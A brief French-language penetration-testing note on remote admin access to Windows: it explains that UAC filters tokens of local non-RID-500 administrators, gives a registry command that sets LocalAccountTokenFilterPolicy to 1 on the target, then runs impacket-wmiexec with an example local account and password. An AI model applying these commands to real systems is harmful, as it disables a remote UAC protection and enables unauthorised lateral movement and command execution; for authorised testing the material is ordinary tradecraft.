Admin local distant — LocalAccountTokenFilterPolicy
Problème
UAC filtre les tokens des comptes LOCAUX admins (sauf RID 500) en accès distant : wmiexec/psexec échouent avec rpc_s_access_denied alors que le compte est bien dans Administrators.
Fix (nécessite SYSTEM/admin sur la cible)
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
Ensuite
impacket-wmiexec './piv:Passw0rd123!@<IP>' 'whoami'